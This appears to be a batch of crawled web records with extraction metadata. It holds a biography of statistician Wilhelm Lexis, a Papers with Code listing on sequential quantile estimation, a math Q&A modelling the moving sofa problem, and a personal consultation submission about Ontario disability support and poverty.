{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8053088784217834, "perplexity": 1542.3560606550989}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571950.76/warc/CC-MAIN-20220813111851-20220813141851-00652.warc.gz"}
https://encyclopediaofmath.org/wiki/Lexis,_Wilhelm
# Lexis, Wilhelm This article Wilhelm Lexis was adapted from an original article by Sébastien Hertz, which appeared in StatProb: The Encyclopedia Sponsored by Statistics and Probability Societies. The original article ([http://statprob.com/encyclopedia/WilhelmLEXIS.html StatProb Source], Local Files: pdf | tex) is copyrighted by the author(s), the article has been donated to Encyclopedia of Mathematics, and its further issues are under Creative Commons Attribution Share-Alike License'. All pages from StatProb are contained in the Category StatProb. Wilhelm LEXIS b. 17 July 1837 - d. 24 August 1914 Summary. In a hostile germanic environment Lexis established statistics as a highly mathematical subject based on the probability calculus, by means of his dispersion theory. Wilhelm Lexis, the son of a physician, was born in Eschweiler near Aachen, in Germany. He studied at the University of Bonn from 1855, first devoting himself to law, and later to mathematics and the natural sciences. He was awarded his doctorate in philosophy in 1859 for a thesis on analytical mechanics. For some time, he taught secondary school mathematics at the Bonn Gymnasium. He also held a job in the Bunsen chemical laboratory in Heidelberg. Lexis' departure for Paris in 1861 marked a turning point in his career. It was there that he developed his interest in the social sciences and political economy, as well as familiarizing himself with the works of Quetelet (q.v.). His first major work, published in Bonn in 1870, was a detailed study of the evolution of France's foreign trade after the restoration of the monarchy (Die Ausfuhrprämien im Zusammenhang mit der Tarifgeschichte und Handelsentwicklung Frankreichs seit der Restauration). In it Lexis stressed the importance of basing economic theories on quantitative data, while not hesitating to make use of mathematics. The Franco-Prussian war of 1870-71 forced him to return to Germany. While editing the Amtliche Nachrichten für Elass-Lothringen at Hagenau, then the seat of the general government of Alsace-Lorraine, he befriended Friedrich Althof, who was to become director of higher education in the Prussian Ministry of Education and Culture. This friendship was at the basis of Lexis' active participation in the exchange of ideas and reforms of German universities. In the autumn of 1872, he was very appropriately appointed as professor extraordinarius (Associate Professor) in political economy at the newly created University of Strasbourg, then one semester old, where Althof was also teaching. It was in the same year that he took part in the formation of the Verein für Sozialpolitik, a movement of university members (the Kathedersozialisten), an offshoot of the historical school whose aim was the promotion of social politics. It was in the Alsatian capital that he wrote his impressive introduction to the theory of statistical demography, Einleitung in die Theorie der Bevölkerungsstatistik, published in 1875. By then he had already left Strasbourg for Dorpat, but not without recognition by award of Doctor rerum politicorum honoris causa in 1874. In Dorpat (now Tartu in Estonia), a town in the Russian Empire where the language of university instruction was German till 1895, he held the Chair as full professor in Geography, Ethnography and Statistics. He spent only two years there, returning to the banks of the Rhine as Chair of Political Economy at the University of Freiburg im Breisgau from 1876 to 1884. This was undoubtedly his most productive period. His publications of the time, most of them appearing in Jahrbücher für Nationalökonomie und Statistik, of which he was chief editor beginning from 1891, propelled him to the front rank in the field of theoretical statistics, and revealed him as the leader of a group working on the application of the calculus of probabilities to statistical data. Lexis simultaneously continued his research in political economy, editing the first German encyclopedia of economic and social sciences Handwörterbuch der Staatswissenschaften. He was particularly expert in the field of finance, publishing his Erörterungen über die Währungsfragen, among other works in 1881. In 1884, he resigned his Chair in Freiburg for the Chair of Statistics (Staatswissenschaften) at the University of Breslau (now Wroclaw in Poland). Finally, in 1887, he moved to Göttingen where he held the Chair of Statistics until his death, a few days after the start of the First World War. Bortkiewicz (q.v.) was his student in Göttingen in 1892. In 1895, Lexis founded the first actuarial institute in Germany (Königliches Seminar für Versicherungswissenschaften), which trained its candidates in both political economy and mathematics. His scholarship in both fields allowed him to manage its direction, and to provide part of the teaching in economics and statistics, while G. Bohlmann took charge of the teaching of mathematics. Lexis left his mark on the history of statistics through his pioneering work on dispersion, which led on to the analysis of variance. Lexis' plan was to measure and compare the fluctuations for different statistical time series. In a sense, he followed Quetelet in applying urn models to statistical series. But by stressing fluctuations, he corrected Quetelet's work, which aimed to set every series within a unique "normal" model by assuming quite erroneously their homogeneity and stability. Similarly, using a binomial urn model to represent the annual number of male births, he derived a dispersion coefficient $Q$ (in homage to Quetelet) which is the ratio of the empirical variance of the series considered to the assumed theoretical variance. An analogous coefficient of divergence had been independently constructed by the French actuary Emile Dormoy in 1874. In the ideal case, Lexis refers to a normal" dispersion when the fluctuations are purely due to chance, and the coefficient is equal to 1. But in most cases the coefficient is different from 1, and thus differs from the binomial model. The fluctuations then indicate a physical" rather than a chance component. Lexis classified these dispersions into two categories, hypernormal" and hyponormal" according as to whether $Q > 1$ or $Q < 1$. He also showed that series of social data usually have a hypernormal dispersion. His studies on the ratio of sexes at birth, his stability theory of statistical series with his famous $Q$ coefficient of dispersion were re-examined in his large treatise entitled "Abhandlungen zur Theorie der Bevölkerungs- und Moralstatistik(1903). In a review of it, Bortkiewicz in 1904 concludes that (Lexis) has known how to clarify and synthesize the most general problems of moral and demographic statistics, insofar as their conditions, methods and tasks are concerned; he has also shown that if this science has had to renounce its status as social physics" to which Quetelet tried to raise it, it remains nevertheless far more than the simple social accounting which some modern, and excessively timid, practitioners of the discipline would have us believe." Lexis' coefficient foreshadowed the statistics of K.Pearson (q.v.) and R.A. Fisher (q.v.), in particular ${\chi}^2$ for the analysis of variance. However, it suffered from certain weaknesses which his more mathematical and younger contemporaries did not fail to point out and attempt to correct, among them Chuprov (q.v.), Markov (q.v.) and Bortkiewicz. In publications up to the period between the two World Wars, the Continental School of mathematical statistics tended to follow the dispersion theory of Lexis, but both eventually gave way together to the Anglo-Saxon developments in this area. Lexis' statistical views, however, did not disappear from view as they had the dubious distinction of being singled out for attack on their reactionary and bourgeois nature within the Soviet Union, by guardians of ideology such as Yastremsky. #### References [1] Bauer, R. (1955). Die Lexissche Dispersionstheorie in ihren Beziehungen zur modernen statistischen Methodenlehre, insbesondere zur Streuungsanalyse (Analysis of Variance), Mitteilungsblatt für mathematische Statistik und ihre Anwendungsgebiete, 7, 25-45. [2] Bortkiewicz, L. von (1915). Wilhelm Lexis, Bulletin de l'Institut International de Statistique, Tome 20, 1ère livraison, pp. 328-332. [3] Bortkiewicz, L. von (1904). Die Theorie der Bevölkerungs - und Moralstatistik nach Lexis, Jahrbücher für Nationalökonomie und Statistik, III. Folge, Bd. 27, pp. 230-254. [4] Heiss, K.-P. (1968). Lexis, Wilhelm, International Encyclopedia of the Social Sciences, 9, 271-276. Macmillan and the Free Press, New York. [5] Heyde, C.C. & Seneta, E. (1977). I.J. Bienaymé: Statistical Theory Anticipated. Springer, New York, pp. 49-58. [6] Stigler, S. M. (1986). The History of Statistics. The Measurement of Uncertainty Before 1900. Belknap Press, Harvard. pp. 221-238. Reprinted with permission from Christopher Charles Heyde and Eugene William Seneta (Editors), Statisticians of the Centuries, Springer-Verlag Inc., New York, USA. How to Cite This Entry: Lexis, Wilhelm. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Lexis,_Wilhelm&oldid=39224
2021-04-19 15:30:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.43578511476516724, "perplexity": 3908.4358736579125}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038887646.69/warc/CC-MAIN-20210419142428-20210419172428-00593.warc.gz"}
https://paperswithcode.com/task/sequential-quantile-estimation
# Sequential Quantile Estimation 2 papers with code • 0 benchmarks • 0 datasets This task has no description! Would you like to contribute one? # Computing Extremely Accurate Quantiles Using t-Digests 11 Feb 2019 We present on-line algorithms for computing approximations of rank-based statistics that give high accuracy, particularly near the tails of a distribution, with very small sketches. 4 # Sequential Quantiles via Hermite Series Density Estimation 17 Jul 2015 These algorithms go beyond existing sequential quantile estimation algorithms in that they allow arbitrary quantiles (as opposed to pre-specified quantiles) to be estimated at any point in time. 1
2022-09-28 10:17:18
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9176556468009949, "perplexity": 6775.400388484274}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335190.45/warc/CC-MAIN-20220928082743-20220928112743-00035.warc.gz"}
https://mathzsolution.com/modelling-the-moving-sofa/
# Modelling the “Moving Sofa” I believe that many of you know about the moving sofa problem; if not you can find the description of the problem here. In this question I am going to rotate the L shaped hall instead of moving a sofa around the corner. By rotating the hall $180^{\circ}$ what remains between the walls will give the shape of the sofa. Like this: The points on the hall have the following properties: \begin{eqnarray} A & = & \left( r\cos { \alpha } ,t\sin { \alpha } \right) \\ { A }’ & = & \left( r\cos { \alpha } +\sqrt { 2 } \cos { \left( \frac { \pi }{ 4 } +\frac { \alpha }{ 2 } \right) } ,t\sin { \alpha } +\sqrt { 2 } \sin { \left( \frac { \pi }{ 4 } +\frac { \alpha }{ 2 } \right) } \right) \\ { B } & = & \left( r\cos { \alpha } -\frac { t\sin { \alpha } }{ \tan { \left( \frac { \alpha }{ 2 } \right) } } ,0 \right) \\ { B }’ & = & \left( r\cos { \alpha } -\frac { t\sin { \alpha } }{ \tan { \left( \frac { \alpha }{ 2 } \right) } } -\frac { 1 }{ \sin { \left( \frac { \alpha }{ 2 } \right) } } ,0 \right) \\ C & = & \left( r\cos { \alpha } +t\sin { \alpha } \tan { \left( \frac { \alpha }{ 2 } \right) } ,0 \right) \\ { C }’ & = & \left( r\cos { \alpha } +t\sin { \alpha } \tan { \left( \frac { \alpha }{ 2 } \right) } +\frac { 1 }{ \cos { \left( \frac { \alpha }{ 2 } \right) } } ,0 \right) \end{eqnarray} Attention: $\alpha$ is not the angle of $AOC$, it is some angle $ADC$ where $D$ changes location on $x$ axis for $r\neq t$. I am saying this because images can create confusion. Anyways I will change them as soon as possible. I could consider $r=f(\alpha)$ and $t=g(\alpha)$ but for this question I am going to take $r$ and $t$ as constants. If they were functions of $\alpha$ there would appear some interesting shapes. I experimented for different functions however the areas are more difficult to calculate, that’s why I am not going to share. Maybe in the future. We rotate the hall for $r=t$ in the example above: In this case: 1. point A moves on a semicircle 2. The envelope of lines between A’ and C’ is a circular arc. One has to prove this but I assume that it is true for $r=t$. If my second assumption is correct the area of sofa is $A= 2r-\frac { \pi r^{ 2 } }{ 2 } +\frac { \pi }{ 2 }$. The maximum area is reached when $r = 2/\pi$ and it’s value is: $$A = 2/\pi+\pi/2 = 2,207416099$$ which matches with Hammersley’s sofa. The shape is also similar or same: Now I am going to increase $t$ with respect to $r$. For $r=2/\pi$ and $t=0.77$: Well, this looks like Gerver’s sofa. I believe thearea can be maximized by finding the equations of envelopes above and below the sofa. Look at this question where @Aretino has computed the area below $ABC$. I don’t know enough to find equations for envelopes. I am afraid that I will make mistakes. I considered to calculate area by counting number of pixels in it, but this is not a good idea because for optimizing the area I have to create many images. I will give a bounty of 200 for whom calculates the maximum area. As I said the most difficult part of the problem is to find equations of envelopes. @Aretino did it. PLUS: Could following be the longest sofa where $(r,t)=((\sqrt 5+1)/2,1)$ ? If you want to investigate further or use animation for educational purposes here is the Geogebra file: http://ggbm.at/vemEtGyj Ok, I had some free time and I count number of pixels in the sofa and I am sure that I have something bigger than Hammersley’s constant. First, I made a simulation for Hammersley’s sofa where $r=t=2/\pi$ and exported the image to png in 300 dpi (6484×3342 pixels) and using Gimp counted number of pixels which have exactly same value. For Hammersley I got $3039086$ pixels. For the second case $r=0.59$ and $t=0.66$ and I got $3052780$ pixels. To calculate area for this case: $$\frac{3052780}{3039086}(2/\pi + \pi/2)=2.217362628$$ which is slightly less than Gerver’s constant which is $2.2195$. Here is the sofa: WARNING: this answer uses the new parameterization of points introduced by the OP: $$\begin{eqnarray} A & = & \left( r\cos { \alpha } ,t\sin { \alpha } \right) \\ { A }’ & = & \left( r\cos { \alpha } +\sqrt { 2 } \cos { \left( \frac { \pi }{ 4 } +\frac { \alpha }{ 2 } \right) } ,t\sin { \alpha } +\sqrt { 2 } \sin { \left( \frac { \pi }{ 4 } +\frac { \alpha }{ 2 } \right) } \right) \\ C & = & \left( r\cos { \alpha } +t\sin { \alpha } \tan { \left( \frac { \alpha }{ 2 } \right) } ,0 \right) \\ { C }’ & = & \left( r\cos { \alpha } +t\sin { \alpha } \tan { \left( \frac { \alpha }{ 2 } \right) } +\frac { 1 }{ \cos { \left( \frac { \alpha }{ 2 } \right) } } ,0 \right) \end{eqnarray}$$ Another parameterization, which also apperaed in a first version of this question, was used in a previous answer to a related question. The inner shape of the sofa is formed by the ellipse of semiaxes $$r$$, $$t$$ and by the envelope of lines $$AC$$ (here and in the following I’ll consider only that part of the sofa in the $$x\ge0$$ half-plane). The equations of lines $$AC$$ can be expressed as a function of $$\alpha$$ ($$0\le\alpha\le\pi$$) as $$F(x,y,\alpha)=0$$, where: $$F(x,y,\alpha)= -t y \sin\alpha \tan{\alpha\over2} – t \sin\alpha \left(x – r \cos\alpha – t \sin\alpha \tan{\alpha\over2}\right).$$ The equation of the envelope can be found from: $$F(x,y,\alpha)={\partial\over\partial\alpha}F(x,y,\alpha)=0,$$ giving the parametric equations for the envelope: \begin{align} x_{inner}=& (r-t) \cos\alpha+\frac{1}{2}(t-r) \cos2\alpha+\frac{1}{2}(r+t),\\ y_{inner}=& 4 (t-r) \sin\frac{\alpha}{2}\, \cos^3\frac{\alpha}{2}.\\ \end{align} We need not consider this envelope if $$t, because in that case $$y_{inner}<0$$. If $$t>r$$ the envelope meets the ellipse at a point $$P$$: the corresponding value of $$\alpha$$ can be found from the equation $$(x_{inner}/r)^2+(y_{inner}/t)^2=1$$, whose solution $$\alpha=\bar\alpha$$ is given by: $$\begin{cases} \displaystyle\bar\alpha= 2\arccos\sqrt{t\over{t+r}}, &\text{for t\le3r;}\\ \displaystyle\bar\alpha= \arccos\sqrt{t\over{2(t-r)}}, &\text{for t\ge3r.}\\ \end{cases}$$ The corresponding values $$\bar\theta$$ for the parameter of the ellipse can be easily computed from: $$\bar\theta=\arcsin(y_{inner}(\bar\alpha)/t)$$: $$\begin{cases} \displaystyle\bar\theta= \arcsin\frac{4 \sqrt{rt} (t-r)}{(r+t)^2}, &\text{for t\le3r;}\\ \displaystyle\bar\theta= \arcsin\frac{\sqrt{t(t-2 r)}}{t-r}, &\text{for t\ge3r.}\\ \end{cases}$$ For $$t\ge r$$ we can then represent half the area under the inner shape of the sofa as an integral: $${1\over2}Area_{inner}=\int_0^{2t-r} y\,dx= \int_{\pi/2}^{\bar\theta}t\sin\theta{d\over d\theta}(r\cos\theta)\,d\theta+ \int_{\bar\alpha}^{\pi} y_{inner}{dx_{inner}\over d\alpha}\,d\alpha.$$ This can be computed explicitly, here’s for instance the result for $$r: \begin{align} {1\over2}Area_{inner}= {\pi\over4}(r^2-rt+t^2) +\frac{1}{48} (t-r)^2 \left[-24 \cos ^{-1}\frac{\sqrt{t}}{\sqrt{r+t}} +12 \sin \left(2 \cos^{-1}\frac{\sqrt{t}}{\sqrt{r+t}}\right)\\ +12 \sin \left(4 \cos^{-1}\frac{\sqrt{t}}{\sqrt{r+t}}\right) -4 \sin \left(6 \cos^{-1}\frac{\sqrt{t}}{\sqrt{r+t}}\right) -3 \sin \left(8 \cos^{-1}\frac{\sqrt{t}}{\sqrt{r+t}}\right) \right]\\ -2 r t {\sqrt{rt} |r^2-6 r t+t^2|\over(r+t)^4} -{1\over4} r t \sin ^{-1}\frac{4 \sqrt{rt} (t-r)}{(r+t)^2}\\ \end{align} The outer shape of the sofa is formed by line $$y=1$$ and by the envelope of lines $$A’C’$$. By repeating the same steps as above one can find the parametric equations of the outer envelope: \begin{align} x_{outer}&= (r-t) \left(\cos\alpha-{1\over2}\cos2\alpha\right) +\cos\frac{\alpha}{2}+{1\over2}(r+t)\\ y_{outer}&= \sin\frac{\alpha}{2} \left(-3 (r-t) \cos\frac{\alpha}{2} +(t-r) \cos\frac{3 \alpha}{2}+1\right)\\ \end{align} This curve meets line $$y=1$$ for $$\alpha=\pi$$ if $$t-r\le\bar x$$, where $$\bar x=\frac{1}{432} \left(17 \sqrt{26 \left(11-\sqrt{13}\right)}-29 \sqrt{2 \left(11-\sqrt{13}\right)}\right)\approx 0.287482$$. In that case the intersection point has coordinates $$(2t-r,1)$$ and the area under the outer shape of the sofa can be readily found: $${1\over2}Area_{outer}={1\over3}(r+2t)+{\pi\over4}(1-(t-r)^2)$$ If, on the other hand, $$t-r>\bar x$$ then one must find the value of parameter $$\alpha$$ at which the envelope meets the line, by solving the equation $$y_{outer}=1$$ and looking for the smallest positive solution. This has to be done, in general, by some numerical method. The area of the sofa can then be found as $$Area_{tot}=Area_{outer}-Area_{inner}$$. I used Mathematica to draw a contour plot of this area, as a function of $$r$$ (horizontal axis) and $$t$$ (vertical axis): There is a clear maximum in the region around $$r = 0.6$$ and $$t = 0.7$$. In this region one can use the simple expressions for $$Area_{inner}$$ and $$Area_{outer}$$ given above, to find the exact value of the maximum. A numerical search gives $$2.217856997942074266$$ for the maximum area, reached for $$r=0.605513519698965$$ and $$t=0.6678342468712839$$.
2023-02-06 06:08:05
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 49, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.998857855796814, "perplexity": 682.5237441823185}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500304.90/warc/CC-MAIN-20230206051215-20230206081215-00020.warc.gz"}
https://esdc-consultations.canada.ca/canadian-poverty-reduction-strategy-stories/stories/it-could-happen-to-you-it-did-happen-to-me
# It could happen to you - It did happen to me by GWAILIN, I am a 48-year-old single male Canadian taxpayer with no dependants, residing in Toronto, and was diagnosed with a chronic health condition in 2015. I come from a financially modest background and I have no family in Ontario. My only family, my mother and brother live in NS, from where I immigrated to Toronto in 1990 in search of employment and opportunity. I have lived in the GTA Toronto-Danforth riding cumulatively for over 15 years. I love my home, which I rent, and particularly the area and community in which I live. My doctor, pharmacist, bank and other amenities are all within several blocks. I had a life-changing event. I was diagnosed with progressive polyneuropathy and somatic pain syndrome in the summer of 2015 after a long, slow progression of the condition. This condition in my case causes among other symptoms, constant severe wide-spread pain throughout my body, ataxic gate and mobility issues. As a result, I now live with a disability and walk with a cane. My condition will not get better, in fact it has gotten and will continue to get worse. It is a progressive, degenerative condition of the nervous system. I started the application process for ODSP (Ontario Disability Support Program) near the end of 2015. I was told I had ‘too much money’ to qualify for support due to some very modest investments I had made in good faith and best intentions some time ago while doing ‘the right thing’ and planning for the future. I first started experiencing symptoms of my condition in 2011. At the end of 2012, due to my worsening symptoms, I had to make the very difficult decision to walk away from a senior management position in a well-established career in the market research industry spanning over two decades, along with a very respectable salary. I had only been employed by my most recent employer for a relatively short period of time, therefore did not qualify for LTD through workplace insurance. My previous employer I was with for over 16 years. Had I not made the fateful choice to leave there to pursue another opportunity, I would have been covered by the previous employer’s workplace insurance. After leaving work, I spent the subsequent 2 years seeking a diagnosis; seeing multiple specialists, technologists, undergoing multiple tests, etc. and was not getting any clear answers. Many doctors were baffled as to the root cause of my symptoms. Fast forward to July 2015 when my condition eventually worsened to the point that I called 911 myself. I could barely walk or take care of myself, was in considerable pain/discomfort, under-nourished and severely dehydrated. Frankly, I thought I was going through renal failure or some other fatal event. On my second visit to emergency, I was finally admitted to hospital where I stayed for ~6 weeks, underwent extensive tests (spinal tap, nerve biopsy, MRI's, ECG’s, EMG’s extensive blood work, etc.) and finally received the aforementioned diagnosis. I was then transferred to a rehab facility where I spent another 3.5 weeks undergoing physiotherapy, etc. Having been blessed with relatively good health my entire life up until that point, it was quite an eye-opener indeed to see the cracks, flaws and strains first-hand, within our underfunded public health care system, but that’s another issue altogether. After leaving work at the beginning of 2013, I lived off my own life savings; ~$100K in savings and investments, with no outside financial assistance. Once my life savings were all but gone (along with my dream of ever being a homeowner) I was in need of financial assistance. I was later horrified being introduced to what I discovered to be a very broken and antiquated system known as the Ontario Disability Support Program (Act, 1997). I was told that I didn’t qualify for assistance because I still had ‘too much money’. After watching my entire hard-earned life savings all but disappear, I had remaining, two modest investments including an RRSP worth ~$XXXX and a non-refundable GIC worth ~$XXXX which was to mature in Aug 2017. I was an open book to ODSP in terms of my financial records and medical history. Aside from those two small investments, I had ~$8K in savings, and shrinking. This is all the money that I had left in the world in order to keep my home which I happen to rent (and for which I paid out of my own pocket to have safety grab bars installed in the shower), to pay utilities, buy food, etc. In order to qualify for ODSP, I was told that one could not have more than $5K in the bank. I couldn’t remember the last time I had less than$5K and now I was being told that I wasn’t allowed to have any more than $5K? Living in Toronto today, that’s a mere 2-3 months away from homelessness at best! It was then that I learned that a person with a disability isn’t allowed to have their own financial safety net. I was literally facing eviction and/or homelessness in a matter of months and ODSP was telling me that I had too much money? One can own a home and a car, both obviously substantial investments/assets and still qualify for ODSP, but renting an apartment and having more than$5K in the bank disqualifies one? How does this make sense? (Albeit anyone owning a home on ODSP likely won’t remain a homeowner for very long). I asked my ODSP intake worker and several politicians if this seemingly arbitrary limit of $5K had been adjusted since the ODSP Act was introduced in 1997? No one could answer me because no one knew (or seemingly cared). In 1997 my rent was nearly half what it is now. Does having$5K in the bank suddenly make a person rich? I can see if maybe someone had $50K or$100K in the bank for instance, which I once had, and spent supporting myself while seeking a diagnosis, staying optimistic and thinking I was going to get better. I have since learned and accepted that I am not going to get better, and have been told that my condition, if it changes, will only worsen. My life is now forever changed for the worse. I was (and still am) trying to hang onto a shred of what I once had and I was being told I had ‘too much money’. What I had/have is relatively a mere pittance. Meanwhile there’s constant, almost daily reports in the media about government waste and fiscal/financial mismanagement. ‘Too much money’ indeed. In order to qualify for the ODSP, I had to liquidate my modest investments so that I could transfer them into an RDSP (Registered Disability Savings Plan), which I had just learned about and was told that now this was ‘the right thing to do’. ODSP does not consider funds in an RDSP as part of their qualification process and once funds are contributed to an RDSP, it is locked-in for 10 years minimum. • In order to liquidate my GIC before maturity, I had to forfeit the interest that had accrued; several hundred dollars. • In order to transfer my RRSP into an RDSP, that too first had to be liquidated, incurring a 20% withholding tax. Why an RRSP can’t be seamlessly transferred into an RDSP is beyond me. Ergo, it cost me well over a thousand dollars in lost interest and tax withholdings to qualify for ODSP, which does not provide adequate money to live on. ODSP only provides me with ~$1400 per month (including special diet and medical travel allowances), about a quarter of what I once earned. My rent alone is$965, not including hydro, phone, internet, food etc. Why can’t one have a modest financial safety net and still qualify so that one can ‘bridge the gap’ between ODSP and the real world, and potentially stay in one’s home for a year or so longer than one would otherwise? Is this the spirit in which the ODSP Act was intended? To deny benefits to someone with a disability because they have a few thousand dollars invested? Trying to obtain affordable/subsidized housing in Toronto is, from my experience, a joke. I applied to ‘Housing Connections’, which maintains the centralized waiting list for subsidized housing in Ontario. I’ve never dealt with a less transparent, apathetic bureaucracy in my life. When I called to check on the status of my application I was basically told ‘don’t call us, we’ll call you’ and that for a single male with no dependents, I’ll be waiting at least 10 years regardless. If/when I lose my apartment, I’ll be on the street and will be even more of a burden on the system. From my understanding, the city issues ‘portable’ housing allowances from time to time, as funding permits, which can provide between $200-$500 per month towards one’s rent. However, from my experience they are discretionarily targeted towards a specific demographic; the last two issued, which I found out about via a third party, were targeted towards mothers leaving domestic abuse and seniors, respectively. Single males with a disability and no dependents are always at the bottom of the list. I couldn’t and still can’t help but feel as though I’m being penalized for trying to do the right things in life, work hard and save for the future. Meanwhile if I had done everything wrong in life, was bankrupt and carried massive debt, then I would more easily have qualified for ODSP. It doesn’t matter that I worked hard my entire life and tried to do the right things. I’m being treated exactly the same way, regardless of my work history and the years I have paid into the system. Many people share the same view that ODSP is a broken, antiquated system. In conversations I’ve had with healthcare professionals, bank managers, CRA agents, PSW’s, social workers, lawyers, family, friends, strangers, even ODSP agents themselves, they all express and agree how unfair, archaic and draconian the system currently is. I once said that I fear homelessness/poverty more than I fear death. Now I fear I’m staring all three straight down the barrel. I had read in old legislative transcripts, that when the ODSP was first introduced in 1997, the intention was to make a clear distinction between persons with disabilities and those on regular welfare. That intention and distinction has clearly long ago fallen by the wayside. When speaking with representatives from some of the various agencies that I’ve come in contact with, clearly many of them have not made that distinction either. Coming from the corporate world and professional environments, I approached each agent or representative as if they were my peer. It didn’t take very long at all to realize that sentiment is far from being reciprocated. Regardless of one’s background or approach, you’re talked down to, treated as a second-class citizen and/or some sort of pariah trying to scam the system. In short, I once had a well-established career along with a very respectable salary which I was forced to leave in 2012 due to the onset of a chronic degenerative neuromuscular condition. As I had recently started a new position at a new organization, I was not eligible for workplace insurance and ‘fell through the cracks’. After supporting myself for 3+ years on my own steadily depleting assets, and an extended hospital stay in 2015, I turned to the ODSP and our ‘social safety net’ for help. I was horrified to learn of the profoundly unpalatable options that were presented to me, but as a single person with no dependents and no family to fall back on, I had nowhere else to turn. I felt completely stripped of my dignity and self-worth as I navigated the many punitive and draconian rules and regulations in order to be assimilated into a system that would not provide me with enough money to survive on. I now live in abject poverty as I count down the months and days that are leading to my inevitable eviction and homelessness, which will happen long before my name comes up on the centralized waiting list for decent subsidized/affordable housing. Frankly (and sadly), I feel as though I’d have a shorter wait on the waiting list for doctor assisted suicide. That may not be a ‘politically correct’ thing to say, but that’s how I feel. The writing is on the wall for me, and my disability is not going away, as it is for countless others in similar situations unless something is done NOW to break this cycle of poverty. comment Consultation has concluded 1 comment over 4 years ago sorry hard to feel sympathy no offence but compared to most of us here you are wealthy. best of luck - what you learned is what we have known for many years
2021-12-02 16:27:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.29067641496658325, "perplexity": 2332.263209872281}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964362230.18/warc/CC-MAIN-20211202145130-20211202175130-00219.warc.gz"}
http://cran.wustl.edu/web/packages/Rarefy/vignettes/Rarefy_basics.html
